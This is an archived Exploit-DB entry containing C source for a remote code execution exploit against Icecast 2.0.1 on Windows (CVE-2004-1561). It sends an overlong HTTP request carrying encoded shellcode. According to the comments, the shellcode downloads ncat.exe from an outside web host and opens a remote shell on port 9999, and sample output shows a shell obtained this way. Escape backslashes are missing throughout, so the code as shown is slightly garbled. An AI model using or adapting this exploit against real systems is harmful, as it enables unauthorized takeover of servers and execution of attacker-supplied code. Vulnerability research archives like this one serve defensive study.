Icecast <= 2.0.1 Win32 - Remote Code Execution Exploit

2004-10-06T00:00:00
ID EDB-ID:568
Type exploitdb
Reporter Delikon
Modified 2004-10-06T00:00:00

Description

Icecast <= 2.0.1 Win32 Remote Code Execution Exploit. CVE-2004-1561. Remote exploit for windows platform

                                        
                                            /* 

by Luigi Auriemma 

Shellcode add-on by Delikon 
www.Delikon.de 

Because of all the forbidden bytes in a http get request 
i had to use a very small shellcode, which was blown up 
by Msf::Encoder::PexAlphaNum. Great encoder. 
------------------------------------------------------------------------- 
C:&gt;iceexec 127.0.0.1 

Icecast &lt;= 2.0.1 Win32 remote code execution 0.1 
by Luigi Auriemma 
e-mail: aluigi@altervista.org 
web:http://aluigi.altervista.org 

shellcode add-on by Delikon 
www.delikon.de 

- target 127.0.0.1:8000 
- send malformed data 

Server IS vulnerable!!! 


C:&gt;nc 127.0.0.1 9999 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:Icecast2 Win32&gt; 
--------------------------------------------------------------------------- 


*/ 

#include &lt;stdio.h&gt; 
#include &lt;stdlib.h&gt; 
#include &lt;string.h&gt; 

#ifdef WIN32 
#pragma comment(lib, "ws2_32.lib") 
    #include &lt;winsock.h&gt; 
    #include "winerr.h" 

    #define close closesocket 
#else 
    #include &lt;unistd.h&gt; 
    #include &lt;sys/socket.h&gt; 
    #include &lt;sys/types.h&gt; 
    #include &lt;arpa/inet.h&gt; 
    #include &lt;netdb.h&gt; 
    #include &lt;netinet/in.h&gt; 
#endif 

#define VER "0.1" 
#define PORT 8000 
#define BUFFSZ2048 
#define TIMEOUT 3 
#define EXEC"GET / HTTP/1.0rn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "xcc" 
//web download and execution shellcode 
//which downloads http://www.elitehaven.net/ncat.exe 
//this ncat spwans a shell on port 9999 
char shellcode[] = "xEB" 
"x03x59xEBx05xE8xF8xFFxFFxFFx4Fx49x49x49x49x49x49x51x5Ax56x54" 
"x58x36x33x30x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56" 
"x58x32x42x44x42x48x34x41x32x41x44x30x41x44x54x42x44x51x42x30" 
"x41x44x41x56x58x34x5Ax38x42x44x4Ax4Fx4Dx49x4Ex4Ex4Cx42x30x42" 
"x50x42x50x4Fx35x4Ax4Ex48x55x42x50x42x30x42x50x49x48x43x4Cx42" 
"x45x4Ax46x50x58x50x34x50x50x4Ex4Ex4Ax4Ex42x36x42x50x42x30x42" 
"x30x41x43x49x4Cx48x56x49x4Bx4Fx36x50x46x41x55x4Ax56x45x57x44" 
"x57x4Ex36x4Dx46x46x55x4Fx4Fx42x4Dx42x45x4Ax46x48x43x4Cx41x4F" 
"x32x42x57x4Ax4Ex48x44x42x50x42x30x42x30x41x43x49x4Cx41x55x41" 
"x35x4Dx48x47x53x48x55x4Dx38x47x47x4Ax50x48x35x41x35x4Fx4Fx42" 
"x4Dx43x55x4Ax56x4Ax59x50x4Fx4Cx38x50x30x4Ax4Ex4Dx32x42x50x42" 
"x30x42x30x41x55x47x35x4Fx4Fx42x4Dx41x53x49x4Cx49x34x44x4Ex50" 
"x4Fx43x35x4Ax46x50x37x4Ax4Dx44x4Ex43x47x4Ax4Ex49x41x42x30x42" 
"x50x42x30x4Fx4Fx42x4Dx45x55x48x55x46x46x41x4Ax42x53x42x30x42" 
"x30x42x30x4Bx48x42x44x4Ex30x4Bx58x42x37x4Ex51x4Dx4Ax4Bx48x4A" 
"x56x4Ax30x49x58x4Ax4Ex50x45x4Dx55x43x4Cx43x35x45x45x48x55x47" 
"x35x4Bx48x4Ex46x46x42x4Ax31x4Bx58x45x54x4Ex33x4Bx58x46x35x45" 
"x30x4Ax57x41x50x4Cx4Ex4Bx38x4Cx34x4Ax41x4Bx58x4Cx55x42x52x41" 
"x50x4Bx4Ex43x4Ex45x43x49x54x4Bx48x46x53x4Bx48x41x50x50x4Ex41" 
"x53x4Fx4Fx4Ex4Fx41x43x42x4Cx4Ex4Ax4Ax43x42x4Ex46x37x47x50x41" 
"x4Cx4Fx4Cx4Dx50x41x30x47x4Cx4Bx4Ex44x4Fx4Bx33x4Ex37x46x52x46" 
"x51x45x47x41x4Ex4Bx48x4Cx35x46x42x41x50x4Bx4Ex48x56x4Bx58x4E" 
"x50x4Bx44x4Bx58x4Cx55x4Ex31x41x30x4Bx4Ex4Bx48x46x50x4Bx58x41" 
"x30x4Ax4Ex49x4Ex44x30x42x50x42x50x42x50x41x53x42x4Cx49x58x4C" 
"x4Ex4Fx55x50x35x4Dx45x4Bx55x43x4Cx4Ax4Ex4Fx42x4Fx4Fx4Fx4Fx4F" 
"x4Fx4Dx36x4Ax46x4Ax56x50x52x45x56x4Ax57x45x46x42x30x4Ax56x46" 
"x47x46x57x42x57x4Cx43x4Fx42x4Fx32x47x47x47x47x47x47x50x42x45" 
"x36x4Ex56x49x36x46x57x45x56x4Ax36x41x36x48x57x45x36x50x56x50" 
"x32x50x46x45x36x46x47x4Fx42x50x46x43x36x41x56x46x37x50x32x45" 
"x36x4Ax37x45x46x42x50x5A"; 


/* 
in my example 0xcc is used to interrupt the code execution, you must 
put your shellcode exactly there. 
You don't need to call a shellcode offset (CALL ESP, JMP ESP and so 
on) or doing any other annoying operation because the code flow 
points directly there!!! 
Cool and easy 8-) 
*/ 


int startWinsock(void) 
{ 
  WSADATA wsa; 
  return WSAStartup(MAKEWORD(2,0),&wsa); 
} 

int timeout(int sock); 
u_long resolv(char *host); 
void std_err(void); 

int main(int argc, char *argv[]) { 
    structsockaddr_in peer; 
    int sd; 
    u_short port = PORT; 
    u_charbuff[BUFFSZ]; 
UCHAR buf[4096]; 
UCHAR *pointer=NULL; 


    setbuf(stdout, NULL); 

    fputs("n" 
        "Icecast &lt;= 2.0.1 Win32 remote code execution "VER"n" 
        "by Luigi Auriemman" 
        "e-mail: aluigi@altervista.orgn" 
        "web:http://aluigi.altervista.orgn" 
  "nshellcode add-on by Delikonn" 
  "www.delikon.de" 
        "n", stdout); 

    if(argc &lt; 2) { 
        printf("nUsage: %s &lt;server&gt; [port(%d)]n" 
            "n" 
            "Note: This exploit will force the Icecast server to download NCATn" 
            "and after execution it will spwan a shell on 9999n" 
            "n", argv[0], PORT); 
        exit(1); 
    } 

#ifdef WIN32 

    startWinsock(); 
#endif 

    if(argc &gt; 2) port = atoi(argv[2]); 

    peer.sin_addr.s_addr = resolv(argv[1]); 
    peer.sin_port= htons(port); 
    peer.sin_family= AF_INET; 

    memset(buf,0x00,sizeof(buf)); 
    strcpy(buf,EXEC); 
    
pointer =strrchr(buf,0xcc); 

strcpy(pointer,shellcode); 

strcat(buf,"rn"); 
strcat(buf,"rn"); 
    

    printf("n- target %s:%hun", 
        inet_ntoa(peer.sin_addr), port); 

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if(sd &lt; 0) std_err(); 

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) 
      &lt; 0) std_err(); 

    fputs("- send malformed datan", stdout); 
    if(send(sd, buf, strlen(buf), 0) 
      &lt; 0) std_err(); 

    if((timeout(sd) &lt; 0) || (recv(sd, buff, BUFFSZ, 0) &lt; 0)) { 
        fputs("nServer IS vulnerable!!!nn", stdout); 
    } else { 
        fputs("nServer doesn't seem vulnerablenn", stdout); 
    } 

    close(sd); 
    return(0); 
} 

int timeout(int sock) { 
    structtimeval tout; 
    fd_setfd_read; 
    int err; 

    tout.tv_sec = TIMEOUT; 
    tout.tv_usec = 0; 
    FD_ZERO(&fd_read); 
    FD_SET(sock, &fd_read); 
    err = select(sock + 1, &fd_read, NULL, NULL, &tout); 
    if(err &lt; 0) std_err(); 
    if(!err) return(-1); 
    return(0); 
} 

u_long resolv(char *host) { 
    structhostent *hp; 
    u_longhost_ip; 

    host_ip = inet_addr(host); 
    if(host_ip == INADDR_NONE) { 
        hp = gethostbyname(host); 
        if(!hp) { 
            printf("nError: Unable to resolve hostname (%s)n", host); 
            exit(1); 
        } else host_ip = *(u_long *)(hp-&gt;h_addr); 
    } 
    return(host_ip); 
} 

#ifndef WIN32 
    void std_err(void) { 
        perror("nError"); 
        exit(1); 
    } 
#endif 

// milw0rm.com [2004-10-06]